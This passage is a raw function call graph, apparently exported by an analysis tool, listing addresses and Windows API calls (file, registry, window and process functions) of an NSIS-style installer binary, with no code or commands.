calls 3134->3135 3136 402190 3135->3136 3137 4029fd 18 API calls 3136->3137 3138 402199 3137->3138 3139 4029fd 18 API calls 3138->3139 3140 4021a2 3139->3140 3149 405ec1 FindFirstFileA 3140->3149 3143 4021bc lstrlenA lstrlenA 3146 404ea6 25 API calls 3143->3146 3144 4021af 3145 404ea6 25 API calls 3144->3145 3148 4021b7 3144->3148 3145->3148 3147 4021f8 SHFileOperationA 3146->3147 3147->3144 3147->3148 3150 4021ab 3149->3150 3151 405ed7 FindClose 3149->3151 3150->3143 3150->3144 3151->3150 3953 40280a 3954 4029e0 18 API calls 3953->3954 3955 402810 3954->3955 3956 402841 3955->3956 3957 40281e 3955->3957 3958 402663 3955->3958 3956->3958 3959 405bdf 18 API calls 3956->3959 3957->3958 3961 405b1b wsprintfA 3957->3961 3959->3958 3961->3958 3969 40220c 3970 402213 3969->3970 3973 402226 3969->3973 3971 405bdf 18 API calls 3970->3971 3972 402220 3971->3972 3974 4053d1 MessageBoxIndirectA 3972->3974 3974->3973 3975 401490 3976 404ea6 25 API calls 3975->3976 3977 401497 3976->3977 3152 401b11 3153 401b62 3152->3153 3154 401b1e 3152->3154 3155 401b66 3153->3155 3156 401b8b GlobalAlloc 3153->3156 3157 401ba6 3154->3157 3160 401b35 3154->3160 3167 402226 3155->3167 3173 405bbd lstrcpynA 3155->3173 3158 405bdf 18 API calls 3156->3158 3159 405bdf 18 API calls 3157->3159 3157->3167 3158->3157 3162 402220 3159->3162 3171 405bbd lstrcpynA 3160->3171 3174 4053d1 3162->3174 3164 401b78 GlobalFree 3164->3167 3166 401b44 3172 405bbd lstrcpynA 3166->3172 3169 401b53 3178 405bbd lstrcpynA 3169->3178 3171->3166 3172->3169 3173->3164 3175 4053e6 3174->3175 3176 4053fa MessageBoxIndirectA 3175->3176 3177 405432 3175->3177 3176->3177 3177->3167 3178->3167 3228 401595 3229 4029fd 18 API calls 3228->3229 3230 40159c SetFileAttributesA 3229->3230 3231 4015ae 3230->3231 3978 401c95 3979 4029e0 18 API calls 3978->3979 3980 401c9c 3979->3980 3981 4029e0 18 API calls 3980->3981 3982 401ca4 GetDlgItem 3981->3982 3983 4024cb 3982->3983 3984 406197 3990 40601b 3984->3990 3985 406986 3986 4060a5 GlobalAlloc 3986->3985 3986->3990 3987 40609c GlobalFree 3987->3986 3988 406113 GlobalFree 3989 40611c GlobalAlloc 3988->3989 3989->3985 3989->3990 3990->3985 3990->3986 3990->3987 3990->3988 3990->3989 3997 402519 3998 4029e0 18 API calls 3997->3998 4002 402523 3998->4002 3999 40258d 4000 4058c6 ReadFile 4000->4002 4001 40258f 4006 405b1b wsprintfA 4001->4006 4002->3999 4002->4000 4002->4001 4003 40259f 4002->4003 4003->3999 4005 4025b5 SetFilePointer 4003->4005 4005->3999 4006->3999 4007 404e1a 4008 404e2a 4007->4008 4009 404e3e 4007->4009 4010 404e30 4008->4010 4011 404e87 4008->4011 4012 404e46 IsWindowVisible 4009->4012 4018 404e5d 4009->4018 4014 403ebf SendMessageA 4010->4014 4013 404e8c CallWindowProcA 4011->4013 4012->4011 4015 404e53 4012->4015 4016 404e3a 4013->4016 4014->4016 4020 404771 SendMessageA 4015->4020 4018->4013 4025 4047f1 4018->4025 4021 4047d0 SendMessageA 4020->4021 4022 404794 GetMessagePos ScreenToClient SendMessageA 4020->4022 4023 4047c8 4021->4023 4022->4023 4024 4047cd 4022->4024 4023->4018 4024->4021 4034 405bbd lstrcpynA 4025->4034 4027 404804 4035 405b1b wsprintfA 4027->4035 4029 40480e 4030 40140b 2 API calls 4029->4030 4031 404817 4030->4031 4036 405bbd lstrcpynA 4031->4036 4033 40481e 4033->4011 4034->4027 4035->4029 4036->4033 3637 40231c 3638 402322 3637->3638 3639 4029fd 18 API calls 3638->3639 3640 402334 3639->3640 3641 4029fd 18 API calls 3640->3641 3642 40233e RegCreateKeyExA 3641->3642 3643 402892 3642->3643 3644 402368 3642->3644 3645 402380 3644->3645 3646 4029fd 18 API calls 3644->3646 3647 40238c 3645->3647 3649 4029e0 18 API calls 3645->3649 3648 402379 lstrlenA 3646->3648 3650 4023a7 RegSetValueExA 3647->3650 3651 402e62 37 API calls 3647->3651 3648->3645 3649->3647 3652 4023bd RegCloseKey 3650->3652 3651->3650 3652->3643 4037 40261c 4038 40261f 4037->4038 4042 402637 4037->4042 4039 40262c FindNextFileA 4038->4039 4040 402676 4039->4040 4039->4042 4043 405bbd lstrcpynA 4040->4043 4043->4042 2899 4039a0 2900 403af3 2899->2900 2901 4039b8 2899->2901 2903 403b44 2900->2903 2904 403b04 GetDlgItem GetDlgItem 2900->2904 2901->2900 2902 4039c4 2901->2902 2905 4039e2 2902->2905 2906 4039cf SetWindowPos 2902->2906 2908 403b9e 2903->2908 2913 401389 2 API calls 2903->2913 2907 403e73 19 API calls 2904->2907 2910 4039e7 ShowWindow 2905->2910 2911 4039ff 2905->2911 2906->2905 2912 403b2e SetClassLongA 2907->2912 2914 403aee 2908->2914 2969 403ebf 2908->2969 2910->2911 2915 403a21 2911->2915 2916 403a07 DestroyWindow 2911->2916 2917 40140b 2 API calls 2912->2917 2918 403b76 2913->2918 2920 403a26 SetWindowLongA 2915->2920 2921 403a37 2915->2921 2919 403dfc 2916->2919 2917->2903 2918->2908 2922 403b7a SendMessageA 2918->2922 2919->2914 2930 403e2d ShowWindow 2919->2930 2920->2914 2925 403ae0 2921->2925 2926 403a43 GetDlgItem 2921->2926 2922->2914 2923 40140b 2 API calls 2940 403bb0 2923->2940 2924 403dfe DestroyWindow EndDialog 2924->2919 3006 403eda 2925->3006 2927 403a73 2926->2927 2928 403a56 SendMessageA IsWindowEnabled 2926->2928 2932 403a80 2927->2932 2933 403ac7 SendMessageA 2927->2933 2934 403a93 2927->2934 2944 403a78 2927->2944 2928->2914 2928->2927 2930->2914 2932->2933 2932->2944 2933->2925 2937 403ab0 2934->2937 2938 403a9b 2934->2938 2936 403e73 19 API calls 2936->2940 2941 40140b 2 API calls 2937->2941 3000 40140b 2938->3000 2939 403aae 2939->2925 2940->2914 2940->2923 2940->2924 2940->2936 2960 403d3e DestroyWindow 2940->2960 2972 405bdf 2940->2972 2990 403e73 2940->2990 2943 403ab7 2941->2943 2943->2925 2943->2944 3003 403e4c 2944->3003 2946 403c2b GetDlgItem 2947 403c40 2946->2947 2948 403c48 ShowWindow KiUserCallbackDispatcher 2946->2948 2947->2948 2993 403e95 KiUserCallbackDispatcher 2948->2993 2950 403c72 EnableWindow 2953 403c86 2950->2953 2951 403c8b GetSystemMenu EnableMenuItem SendMessageA 2952 403cbb SendMessageA 2951->2952 2951->2953 2952->2953 2953->2951 2994 403ea8 SendMessageA 2953->2994 2995 405bbd lstrcpynA 2953->2995 2956 403ce9 lstrlenA 2957 405bdf 18 API calls 2956->2957 2958 403cfa SetWindowTextA 2957->2958 2996 401389 2958->2996 2960->2919 2961 403d58 CreateDialogParamA 2960->2961 2961->2919 2962 403d8b 2961->2962 2963 403e73 19 API calls 2962->2963 2964 403d96 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2963->2964 2965 401389 2 API calls 2964->2965 2966 403ddc 2965->2966 2966->2914 2967 403de4 ShowWindow 2966->2967 2968 403ebf SendMessageA 2967->2968 2968->2919 2970 403ed7 2969->2970 2971 403ec8 SendMessageA 2969->2971 2970->2940 2971->2970 2973 405bec 2972->2973 2974 405e0f 2973->2974 2977 405c8d GetVersion 2973->2977 2978 405de6 lstrlenA 2973->2978 2979 405bdf 10 API calls 2973->2979 2982 405d05 GetSystemDirectoryA 2973->2982 2984 405d18 GetWindowsDirectoryA 2973->2984 2986 405bdf 10 API calls 2973->2986 2987 405d8f lstrcatA 2973->2987 2988 405d4c SHGetSpecialFolderLocation 2973->2988 3020 405aa4 RegOpenKeyExA 2973->3020 3025 405e28 2973->3025 3034 405b1b wsprintfA 2973->3034 3035 405bbd lstrcpynA 2973->3035 2975 405e24 2974->2975 3036 405bbd lstrcpynA 2974->3036 2975->2940 2977->2973 2978->2973 2979->2978 2982->2973 2984->2973 2986->2973 2987->2973 2988->2973 2989 405d64 SHGetPathFromIDListA CoTaskMemFree 2988->2989 2989->2973 2991 405bdf 18 API calls 2990->2991 2992 403e7e SetDlgItemTextA 2991->2992 2992->2946 2993->2950 2994->2953 2995->2956 2998 401390 2996->2998 2997 4013fe 2997->2940 2998->2997 2999 4013cb MulDiv SendMessageA 2998->2999 2999->2998 3001 401389 2 API calls 3000->3001 3002 401420 3001->3002 3002->2944 3004 403e53 3003->3004 3005 403e59 SendMessageA 3003->3005 3004->3005 3005->2939 3007 403ef2 GetWindowLongA 3006->3007 3017 403f7b 3006->3017 3008 403f03 3007->3008 3007->3017 3009 403f12 GetSysColor 3008->3009 3010 403f15 3008->3010 3009->3010 3011 403f25 SetBkMode 3010->3011 3012 403f1b SetTextColor 3010->3012 3013 403f43 3011->3013 3014 403f3d GetSysColor 3011->3014 3012->3011 3015 403f54 3013->3015 3016 403f4a SetBkColor 3013->3016 3014->3013 3015->3017 3018 403f67 DeleteObject 3015->3018 3019 403f6e CreateBrushIndirect 3015->3019 3016->3015 3017->2914 3018->3019 3019->3017 3021 405b15 3020->3021 3022 405ad7 RegQueryValueExA 3020->3022 3021->2973 3023 405af8 RegCloseKey 3022->3023 3023->3021 3026 405e34 3025->3026 3028 405e9c 3026->3028 3029 405e91 CharNextA 3026->3029 3032 405e7f CharNextA 3026->3032 3033 405e8c CharNextA 3026->3033 3037 405678 3026->3037 3027 405ea0 CharPrevA 3027->3028 3028->3027 3030 405ebb 3028->3030 3029->3026 3029->3028 3030->2973 3032->3026 3033->3029 3034->2973 3035->2973 3036->2975 3038 40567e 3037->3038 3039 405691 3038->3039 3040 405684 CharNextA 3038->3040 3039->3026 3040->3038 4051 4016a1 4052 4029fd 18 API calls 4051->4052 4053 4016a7 GetFullPathNameA 4052->4053 4054 4016be 4053->4054 4060 4016df 4053->4060 4057 405ec1 2 API calls 4054->4057 4054->4060 4055 402892 4056 4016f3 GetShortPathNameA 4056->4055 4058 4016cf 4057->4058 4058->4060 4061 405bbd lstrcpynA 4058->4061 4060->4055 4060->4056 4061->4060 4062 404823 GetDlgItem GetDlgItem 4063 404875 7 API calls 4062->4063 4066 404a8d 4062->4066 4064 404918 DeleteObject 4063->4064 4065 40490b SendMessageA 4063->4065 4067 404921 4064->4067 4065->4064 4079 404771 5 API calls 4066->4079 4083 404b71 4066->4083 4096 404afe 4066->4096 4068 404958 4067->4068 4069 405bdf 18 API calls 4067->4069 4070 403e73 19 API calls 4068->4070 4072 40493a SendMessageA SendMessageA 4069->4072 4075 40496c 4070->4075 4071 404c1d 4073 404c27 SendMessageA 4071->4073 4074 404c2f 4071->4074 4072->4067 4073->4074 4084 404c41 ImageList_Destroy 4074->4084 4085 404c48 4074->4085 4093 404c58 4074->4093 4080 403e73 19 API calls 4075->4080 4076 404a80 4077 403eda 8 API calls 4076->4077 4082 404e13 4077->4082 4078 404b63 SendMessageA 4078->4083 4079->4096 4097 40497a 4080->4097 4081 404bca SendMessageA 4081->4076 4087 404bdf SendMessageA 4081->4087 4083->4071 4083->4076 4083->4081 4084->4085 4088 404c51 GlobalFree 4085->4088 4085->4093 4086 404dc7 4086->4076 4091 404dd9 ShowWindow GetDlgItem ShowWindow 4086->4091 4090 404bf2 4087->4090 4088->4093 4089 404a4e GetWindowLongA SetWindowLongA 4092 404a67 4089->4092 4098 404c03 SendMessageA 4090->4098 4091->4076 4094 404a85 4092->4094 4095 404a6d ShowWindow 4092->4095 4093->4086 4105 4047f1 4 API calls 4093->4105 4109 404c93 4093->4109 4114 403ea8 SendMessageA 4094->4114 4113 403ea8 SendMessageA 4095->4113 4096->4078 4096->4083 4097->4089 4099 404a48 4097->4099 4102 4049c9 SendMessageA 4097->4102 4103 404a05 SendMessageA 4097->4103 4104 404a16 SendMessageA 4097->4104 4098->4071 4099->4089 4099->4092 4102->4097 4103->4097 4104->4097 4105->4109 4106 404d9d InvalidateRect 4106->4086 4107 404db3 4106->4107 4115 40472c 4107->4115 4108 404cc1 SendMessageA 4112 404cd7 4108->4112 4109->4108 4109->4112 4111 404d4b SendMessageA SendMessageA 4111->4112 4112->4106 4112->4111 4113->4076 4114->4066 4118 404667 4115->4118 4117 404741 4117->4086 4119 40467d 4118->4119 4120 405bdf 18 API calls 4119->4120 4121 4046e1 4120->4121 4122 405bdf 18 API calls 4121->4122 4123 4046ec 4122->4123 4124 405bdf 18 API calls 4123->4124 4125 404702 lstrlenA wsprintfA SetDlgItemTextA 4124->4125 4125->4117 4126 401d26 GetDC GetDeviceCaps 4127 4029e0 18 API calls 4126->4127 4128 401d44 MulDiv ReleaseDC 4127->4128 4129 4029e0 18 API calls 4128->4129 4130 401d63 4129->4130 4131 405bdf 18 API calls 4130->4131 4132 401d9c CreateFontIndirectA 4131->4132 4133 4024cb 4132->4133 4134 40172c 4135 4029fd 18 API calls 4134->4135 4136 401733 4135->4136 4137 40587d 2 API calls 4136->4137 4138 40173a 4137->4138 4138->4138 4139 401dac 4140 4029e0 18 API calls 4139->4140 4141 401db2 4140->4141 4142 4029e0 18 API calls 4141->4142 4143 401dbb 4142->4143 4144 401dc2 ShowWindow 4143->4144 4145 401dcd EnableWindow 4143->4145 4146 402892 4144->4146 4145->4146 4147 401eac 4148 4029fd 18 API calls 4147->4148 4149 401eb3 4148->4149 4150 405ec1 2 API calls 4149->4150 4151 401eb9 4150->4151 4153 401ecb 4151->4153 4154 405b1b wsprintfA 4151->4154 4154->4153 4155 40192d 4156 4029fd 18 API calls 4155->4156 4157 401934 lstrlenA 4156->4157 4158 4024cb 4157->4158 4159 4024af 4160 4029fd 18 API calls 4159->4160 4161 4024b6 4160->4161 4164 40584e GetFileAttributesA CreateFileA 4161->4164 4163 4024c2 4164->4163 4165 401cb0 4166 4029e0 18 API calls 4165->4166 4167 401cc0 SetWindowLongA 4166->4167 4168 402892 4167->4168 4169 401a31 4170 4029e0 18 API calls 4169->4170 4171 401a37 4170->4171 4172 4029e0 18 API calls 4171->4172 4173 4019e1 4172->4173 4174 4042b1 4175 4042dd 4174->4175 4176 4042ee 4174->4176 4235 4053b5 GetDlgItemTextA 4175->4235 4178 4042fa GetDlgItem 4176->4178 4181 404359 4176->4181 4180 40430e 4178->4180 4179 4042e8 4182 405e28 5 API calls 4179->4182 4184 404322 SetWindowTextA 4180->4184 4189 4056e6 4 API calls 4180->4189 4185 405bdf 18 API calls 4181->4185 4196 40443d 4181->4196 4233 4045e6 4181->4233 4182->4176 4187 403e73 19 API calls 4184->4187 4190 4043cd SHBrowseForFolderA 4185->4190 4186 40446d 4191 40573b 18 API calls 4186->4191 4192 40433e 4187->4192 4188 403eda 8 API calls 4193 4045fa 4188->4193 4194 404318 4189->4194 4195 4043e5 CoTaskMemFree 4190->4195 4190->4196 4197 404473 4191->4197 4198 403e73 19 API calls 4192->4198 4194->4184 4201 40564d 3 API calls 4194->4201 4199 40564d 3 API calls 4195->4199 4196->4233 4237 4053b5 GetDlgItemTextA 4196->4237 4238 405bbd lstrcpynA 4197->4238 4200 40434c 4198->4200 4202 4043f2 4199->4202 4236 403ea8 SendMessageA 4200->4236 4201->4184 4205 404429 SetDlgItemTextA 4202->4205 4210 405bdf 18 API calls 4202->4210 4205->4196 4206 404352 4208 405ee8 3 API calls 4206->4208 4207 40448a 4209 405ee8 3 API calls 4207->4209 4208->4181 4217 404492 4209->4217 4211 404411 lstrcmpiA 4210->4211 4211->4205 4214 404422 lstrcatA 4211->4214 4212 4044cc 4239 405bbd lstrcpynA 4212->4239 4214->4205 4215 4044d5 4216 4056e6 4 API calls 4215->4216 4218 4044db GetDiskFreeSpaceA 4216->4218 4217->4212 4220 405694 2 API calls 4217->4220 4222 404524 4217->4222 4221 4044fd MulDiv 4218->4221 4218->4222 4220->4217 4221->4222 4223 404595 4222->4223 4224 40472c 21 API calls 4222->4224 4225 4045b8 4223->4225 4227 40140b 2 API calls 4223->4227 4226 404582 4224->4226 4240 403e95 KiUserCallbackDispatcher 4225->4240 4229 404597 SetDlgItemTextA 4226->4229 4230 404587 4226->4230 4227->4225 4229->4223 4232 404667 21 API calls 4230->4232 4231 4045d4 4231->4233 4241 404246 4231->4241 4232->4223 4233->4188 4235->4179 4236->4206 4237->4186 4238->4207 4239->4215 4240->4231 4242 404254 4241->4242 4243 404259 SendMessageA 4241->4243 4242->4243 4243->4233 3179 401e32 3180 4029fd 18 API calls 3179->3180 3181 401e38 3180->3181 3182 404ea6 25 API calls 3181->3182 3183 401e42 3182->3183 3195 40536c CreateProcessA 3183->3195 3185 401e9e CloseHandle 3189 402663 3185->3189 3186 401e67 WaitForSingleObject 3187 401e48 3186->3187 3188 401e75 GetExitCodeProcess 3186->3188 3187->3185 3187->3186 3187->3189 3198 405f21 3187->3198 3191 401e92 3188->3191 3192 401e87 3188->3192 3191->3185 3194 401e90 3191->3194 3202 405b1b wsprintfA 3192->3202 3194->3185 3196 4053ab 3195->3196 3197 40539f CloseHandle 3195->3197 3196->3187 3197->3196 3199 405f3e PeekMessageA 3198->3199 3200 405f34 DispatchMessageA 3199->3200 3201 405f4e 3199->3201 3200->3199 3201->3186 3202->3194 3203 4015b3 3204 4029fd 18 API calls 3203->3204 3205 4015ba 3204->3205 3221 4056e6 CharNextA CharNextA 3205->3221 3207 40160a 3209 401638 3207->3209 3210 40160f 3207->3210 3208 405678 CharNextA 3211 4015d0 CreateDirectoryA 3208->3211 3215 401423 25 API calls 3209->3215 3212 401423 25 API calls 3210->3212 3213 4015c2 3211->3213 3214 4015e5 GetLastError 3211->3214 3216 401616 3212->3216 3213->3207 3213->3208 3214->3213 3217 4015f2 GetFileAttributesA 3214->3217 3220 401630 3215->3220 3227 405bbd lstrcpynA 3216->3227 3217->3213 3219 401621 SetCurrentDirectoryA 3219->3220 3222 405701 3221->3222 3225 405711 3221->3225 3224 40570c CharNextA 3222->3224 3222->3225 3223 405731 3223->3213 3224->3223 3225->3223 3226 405678 CharNextA 3225->3226 3226->3225 3227->3219 3232 4030b6 #17 SetErrorMode OleInitialize 3307 405ee8 GetModuleHandleA 3232->3307 3236 403126 GetCommandLineA 3312 405bbd lstrcpynA 3236->3312 3238 403138 GetModuleHandleA 3239 40314f 3238->3239 3240 405678 CharNextA 3239->3240 3241 403163 CharNextA 3240->3241 3246 403173 3241->3246 3242 40323d 3243 403250 GetTempPathA 3242->3243 3313 403082 3243->3313 3245 403268 3247 4032c2 DeleteFileA 3245->3247 3248 40326c GetWindowsDirectoryA lstrcatA 3245->3248 3246->3242 3249 405678 CharNextA 3246->3249 3253 40323f 3246->3253 3321 402c29 GetTickCount GetModuleFileNameA 3247->3321 3250 403082 11 API calls 3248->3250 3249->3246 3252 403288 3250->3252 3252->3247 3257 40328c GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3252->3257 3403 405bbd lstrcpynA 3253->3403 3254 4032d6 3255 40336c 3254->3255 3258 40335c 3254->3258 3262 405678 CharNextA 3254->3262 3420 403534 3255->3420 3260 403082 11 API calls 3257->3260 3349 40360e 3258->3349 3264 4032ba 3260->3264 3265 4032f1 3262->3265 3264->3247 3264->3255 3271 403337 3265->3271 3272 40339b lstrcatA lstrcmpiA 3265->3272 3266 403385 3269 4053d1 MessageBoxIndirectA 3266->3269 3267 403479 3268 40351c ExitProcess 3267->3268 3270 405ee8 3 API calls 3267->3270 3273 403393 ExitProcess 3269->3273 3275 40348c 3270->3275 3404 40573b 3271->3404 3272->3255 3277 4033b7 CreateDirectoryA SetCurrentDirectoryA 3272->3277 3278 405ee8 3 API calls 3275->3278 3280 4033d9 3277->3280 3281 4033ce 3277->3281 3282 403495 3278->3282 3428 405bbd lstrcpynA 3280->3428 3427 405bbd lstrcpynA 3281->3427 3285 405ee8 3 API calls 3282->3285 3287 40349e 3285->3287 3290 4034bc 3287->3290 3296 4034ac GetCurrentProcess 3287->3296 3288 403351 3419 405bbd lstrcpynA 3288->3419 3289 405bdf 18 API calls 3292 403418 DeleteFileA 3289->3292 3293 405ee8 3 API calls 3290->3293 3294 403425 CopyFileA 3292->3294 3304 4033e7 3292->3304 3295 4034f3 3293->3295 3294->3304 3297 403508 ExitWindowsEx 3295->3297 3300 403515 3295->3300 3296->3290 3297->3268 3297->3300 3298 40346d 3301 405a71 40 API calls 3298->3301 3302 40140b 2 API calls 3300->3302 3301->3255 3302->3268 3303 405bdf 18 API calls 3303->3304 3304->3289 3304->3298 3304->3303 3305 40536c 2 API calls 3304->3305 3306 403459 CloseHandle 3304->3306 3429 405a71 3304->3429 3305->3304 3306->3304 3308 405f04 LoadLibraryA 3307->3308 3309 405f0f GetProcAddress 3307->3309 3308->3309 3310 4030fb SHGetFileInfoA 3308->3310 3309->3310 3311 405bbd lstrcpynA 3310->3311 3311->3236 3312->3238 3314 405e28 5 API calls 3313->3314 3315 40308e 3314->3315 3316 403098 3315->3316 3434 40564d lstrlenA CharPrevA 3315->3434 3316->3245 3441 40584e GetFileAttributesA CreateFileA 3321->3441 3323 402c69 3341 402c79 3323->3341 3442 405bbd lstrcpynA 3323->3442 3325 402c8f 3443 405694 lstrlenA 3325->3443 3329 402ca0 GetFileSize 3330 402d9c 3329->3330 3343 402cb7 3329->3343 3448 402bc5 3330->3448 3332 402da5 3334 402dd5 GlobalAlloc 3332->3334 3332->3341 3485 40306b SetFilePointer 3332->3485 3459 40306b SetFilePointer 3334->3459 3336 402e08 3338 402bc5 6 API calls 3336->3338 3338->3341 3339 402dbe 3342 403055 ReadFile 3339->3342 3340 402df0 3460 402e62 3340->3460 3341->3254 3345 402dc9 3342->3345 3343->3330 3343->3336 3343->3341 3346 402bc5 6 API calls 3343->3346 3482 403055 3343->3482 3345->3334 3345->3341 3346->3343 3347 402dfc 3347->3341 3347->3347 3348 402e39 SetFilePointer 3347->3348 3348->3341 3350 405ee8 3 API calls 3349->3350 3351 403622 3350->3351 3352 403628 3351->3352 3353 40363a 3351->3353 3505 405b1b wsprintfA 3352->3505 3354 405aa4 3 API calls 3353->3354 3355 403665 3354->3355 3357 403683 lstrcatA 3355->3357 3358 405aa4 3 API calls 3355->3358 3359 403638 3357->3359 3358->3357 3496 4038d3 3359->3496 3362 40573b 18 API calls 3363 4036b5 3362->3363 3364 40373e 3363->3364 3366 405aa4 3 API calls 3363->3366 3365 40573b 18 API calls 3364->3365 3367 403744 3365->3367 3375 4036e1 3366->3375 3368 403754 LoadImageA 3367->3368 3369 405bdf 18 API calls 3367->3369 3370 4037fa 3368->3370 3371 40377b RegisterClassA 3368->3371 3369->3368 3373 40140b 2 API calls 3370->3373 3372 4037b1 SystemParametersInfoA CreateWindowExA 3371->3372 3401 403804 3371->3401 3372->3370 3378 403800 3373->3378 3374 4036fd lstrlenA 3376 403731 3374->3376 3377 40370b lstrcmpiA 3374->3377 3375->3364 3375->3374 3379 405678 CharNextA 3375->3379 3381 40564d 3 API calls 3376->3381 3377->3376 3380 40371b GetFileAttributesA 3377->3380 3384 4038d3 19 API calls 3378->3384 3378->3401 3382 4036fb 3379->3382 3383 403727 3380->3383 3385 403737 3381->3385 3382->3374 3383->3376 3386 405694 2 API calls 3383->3386 3387 403811 3384->3387 3506 405bbd lstrcpynA 3385->3506 3386->3376 3389 4038a0 3387->3389 3390 40381d ShowWindow LoadLibraryA 3387->3390 3391 404f78 5 API calls 3389->3391 3392 403843 GetClassInfoA 3390->3392 3393 40383c LoadLibraryA 3390->3393 3394 4038a6 3391->3394 3395 403857 GetClassInfoA RegisterClassA 3392->3395 3396 40386d DialogBoxParamA 3392->3396 3393->3392 3397 4038c2 3394->3397 3398 4038aa 3394->3398 3395->3396 3399 40140b 2 API calls 3396->3399 3400 40140b 2 API calls 3397->3400 3398->3401 3402 40140b 2 API calls 3398->3402 3399->3401 3400->3401 3401->3255 3402->3401 3403->3243 3508 405bbd lstrcpynA 3404->3508 3406 40574c 3407 4056e6 4 API calls 3406->3407 3408 405752 3407->3408 3409 403342 3408->3409 3410 405e28 5 API calls 3408->3410 3409->3255 3418 405bbd lstrcpynA 3409->3418 3416 405762 3410->3416 3411 40578d lstrlenA 3412 405798 3411->3412 3411->3416 3413 40564d 3 API calls 3412->3413 3415 40579d GetFileAttributesA 3413->3415 3414 405ec1 2 API calls 3414->3416 3415->3409 3416->3409 3416->3411 3416->3414 3417 405694 2 API calls 3416->3417 3417->3411 3418->3288 3419->3258 3421 40354c 3420->3421 3422 40353e CloseHandle 3420->3422 3509 403579 3421->3509 3422->3421 3427->3280 3428->3304 3430 405ee8 3 API calls 3429->3430 3431 405a78 3430->3431 3433 405a99 3431->3433 3563 4058f5 lstrcpyA 3431->3563 3433->3304 3435 4030a0 CreateDirectoryA 3434->3435 3436 405667 lstrcatA 3434->3436 3437 40587d 3435->3437 3436->3435 3438 405888 GetTickCount GetTempFileNameA 3437->3438 3439 4030b4 3438->3439 3440 4058b5 3438->3440 3439->3245 3440->3438 3440->3439 3441->3323 3442->3325 3444 4056a1 3443->3444 3445 402c95 3444->3445 3446 4056a6 CharPrevA 3444->3446 3447 405bbd lstrcpynA 3445->3447 3446->3444 3446->3445 3447->3329 3449 402be6 3448->3449 3450 402bce 3448->3450 3453 402bf6 GetTickCount 3449->3453 3454 402bee 3449->3454 3451 402bd7 DestroyWindow 3450->3451 3452 402bde 3450->3452 3451->3452 3452->3332 3456 402c04 CreateDialogParamA ShowWindow 3453->3456 3457 402c27 3453->3457 3455 405f21 2 API calls 3454->3455 3458 402bf4 3455->3458 3456->3457 3457->3332 3458->3332 3459->3340 3462 402e78 3460->3462 3461 402ea3 3464 403055 ReadFile 3461->3464 3462->3461 3493 40306b SetFilePointer 3462->3493 3465 402eae 3464->3465 3466 402ec0 GetTickCount 3465->3466 3467 402fe9 3465->3467 3474 402fd4 3465->3474 3478 402ed3 3466->3478 3468 402fed 3467->3468 3470 403005 3467->3470 3469 403055 ReadFile 3468->3469 3469->3474 3471 403055 ReadFile 3470->3471 3473 403020 WriteFile 3470->3473 3470->3474 3471->3470 3472 403055 ReadFile 3472->3478 3473->3474 3475 403035 3473->3475 3474->3347 3475->3470 3475->3474 3477 402f39 GetTickCount 3477->3478 3478->3472 3478->3474 3478->3477 3479 402f62 MulDiv wsprintfA 3478->3479 3480 402fa0 WriteFile 3478->3480 3486 405fe8 3478->3486 3481 404ea6 25 API calls 3479->3481 3480->3474 3480->3478 3481->3478 3494 4058c6 ReadFile 3482->3494 3485->3339 3487 40600d 3486->3487 3488 406015 3486->3488 3487->3478 3488->3487 3489 4060a5 GlobalAlloc 3488->3489 3490 40609c GlobalFree 3488->3490 3491 406113 GlobalFree 3488->3491 3492 40611c GlobalAlloc 3488->3492 3489->3487 3489->3488 3490->3489 3491->3492 3492->3487 3492->3488 3493->3461 3495 403068 3494->3495 3495->3343 3497 4038e7 3496->3497 3507 405b1b wsprintfA 3497->3507 3499 403958 3500 405bdf 18 API calls 3499->3500 3501 403964 SetWindowTextA 3500->3501 3502 403980 3501->3502 3503 403693 3501->3503 3502->3503 3504 405bdf 18 API calls 3502->3504 3503->3362 3504->3502 3505->3359 3506->3364 3507->3499 3508->3406 3510 403587 3509->3510 3511 403551 3510->3511 3512 40358c FreeLibrary GlobalFree 3510->3512 3513 40547d 3511->3513 3512->3511 3512->3512 3514 40573b 18 API calls 3513->3514 3515 40549d 3514->3515 3516 4054a5 DeleteFileA 3515->3516 3517 4054bc 3515->3517 3544 403375 OleUninitialize 3516->3544 3520 4055ea 3517->3520 3550 405bbd lstrcpynA 3517->3550 3519 4054e2 3521 4054f5 3519->3521 3522 4054e8 lstrcatA 3519->3522 3523 405ec1 2 API calls 3520->3523 3520->3544 3525 405694 2 API calls 3521->3525 3524 4054fb 3522->3524 3526 40560e 3523->3526 3527 405509 lstrcatA 3524->3527 3528 405514 lstrlenA FindFirstFileA 3524->3528 3525->3524 3529 40564d 3 API calls 3526->3529 3526->3544 3527->3528 3528->3520 3548 405538 3528->3548 3531 405618 3529->3531 3530 405678 CharNextA 3530->3548 3532 405435 5 API calls 3531->3532 3533 405624 3532->3533 3534 405628 3533->3534 3535 40563e 3533->3535 3540 404ea6 25 API calls 3534->3540 3534->3544 3536 404ea6 25 API calls 3535->3536 3536->3544 3537 4055c9 FindNextFileA 3539 4055e1 FindClose 3537->3539 3537->3548 3539->3520 3541 405635 3540->3541 3542 405a71 40 API calls 3541->3542 3542->3544 3544->3266 3544->3267 3545 40547d 64 API calls 3545->3548 3546 404ea6 25 API calls 3546->3537 3547 404ea6 25 API calls 3547->3548 3548->3530 3548->3537 3548->3545 3548->3546 3548->3547 3549 405a71 40 API calls 3548->3549 3551 405bbd lstrcpynA 3548->3551 3552 405435 3548->3552 3549->3548 3550->3519 3551->3548 3560 405829 GetFileAttributesA 3552->3560 3555 405462 3555->3548 3556 405450 RemoveDirectoryA 3558 40545e 3556->3558 3557 405458 DeleteFileA 3557->3558 3558->3555 3559 40546e SetFileAttributesA 3558->3559 3559->3555 3561 405441 3560->3561 3562 40583b SetFileAttributesA 3560->3562 3561->3555 3561->3556 3561->3557 3562->3561 3564 405944 GetShortPathNameA 3563->3564 3565 40591e 3563->3565 3567 405959 3564->3567 3568 405a6b 3564->3568 3588 40584e GetFileAttributesA CreateFileA 3565->3588 3567->3568 3570 405961 wsprintfA 3567->3570 3568->3433 3569 405928 CloseHandle GetShortPathNameA 3569->3568 3571 40593c 3569->3571 3572 405bdf 18 API calls 3570->3572 3571->3564 3571->3568 3573 405989 3572->3573 3589 40584e GetFileAttributesA CreateFileA 3573->3589 3575 405996 3575->3568 3576 4059a5 GetFileSize GlobalAlloc 3575->3576 3577 405a64 CloseHandle 3576->3577 3578 4059c7 3576->3578 3577->3568 3579 4058c6 ReadFile 3578->3579 3580 4059cf 